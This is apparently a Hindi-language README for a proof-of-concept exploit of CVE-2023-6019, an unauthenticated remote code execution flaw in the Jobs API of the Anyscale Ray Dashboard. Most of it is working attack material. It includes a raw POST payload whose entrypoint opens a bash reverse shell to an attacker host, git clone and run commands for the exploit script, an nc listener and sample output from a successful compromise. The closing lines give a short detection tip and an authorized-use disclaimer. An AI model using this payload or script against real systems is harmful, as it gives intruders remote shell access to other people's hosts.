
CVE-2023-6019 के लिए PoC एक्सप्लॉइट जो Anyscale Ray Dashboard में Jobs API के माध्यम से बिना प्रमाणीकरण के रिमोट कोड एक्ज़ीक्यूशन को लक्षित करता है। कमजोर Ray इंस्टेंसेस (< 2.6.4) पर रिवर्स शेल प्रदान करता है।
CVE-2023-6019 के लिए PoC शोषण — बिना प्रमाणीकरण के Ray डैशबोर्ड Jobs API के माध्यम से रिमोट कोड निष्पादन।
oguiii द्वारा निर्मित
Anyscale Ray वितरित ML/AI कार्यभार के लिए एक ओपन-सोर्स फ्रेमवर्क है। 2.6.4 से पहले के संस्करण Ray डैशबोर्ड (डिफ़ॉल्ट पोर्ट 8265) के माध्यम से Jobs सबमिशन API को बिना किसी प्रमाणीकरण के उजागर करते हैं, जिससे एक अप्रमाणित हमलावर मनमाने कार्य सबमिट कर सकता है और होस्ट पर रिमोट कोड निष्पादन प्राप्त कर सकता है।
/api/jobs/ एंडपॉइंट एक JSON पेलोड स्वीकार करता है जिसमें entrypoint फ़ील्ड होता है, जिसे Ray कर्मचारी प्रक्रिया द्वारा शेल कमांड के रूप में निष्पादित किया जाता है - कोई क्रेडेंशियल आवश्यक नहीं।
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json
{
"entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
"runtime_env": {},
"job_id": null,
"metadata": {}
}
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>
| फ़्लैग | विवरण | डिफ़ॉल्ट |
|---|---|---|
-t | लक्ष्य IP या होस्टनाम | आवश्यक |
-p | Ray डैशबोर्ड पोर्ट | 8265 |
-l | हमलावर IP (रिवर्स शेल) | आवश्यक |
-lp | हमलावर पोर्ट (रिवर्स शेल) | आवश्यक |
# लिसनर शुरू करें
nc -lvnp 4444
# शोषण चलाएं
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019
[*] Target : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...
[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc
[>] Make sure your listener is ready:
nc -lvnp 4444
अपने HTTP लॉग या नेटवर्क ट्रैफ़िक में पोर्ट 8265 पर /api/jobs/ के लिए अप्रत्याशित POST अनुरोधों की तलाश करें।
यह उपकरण केवल अधिकृत प्रवेश परीक्षण और शैक्षिक उद्देश्यों के लिए है।
लेखक इस उपकरण के दुरुपयोग या इससे होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं है।
परीक्षण से पहले हमेशा उचित लिखित प्राधिकरण प्राप्त करें।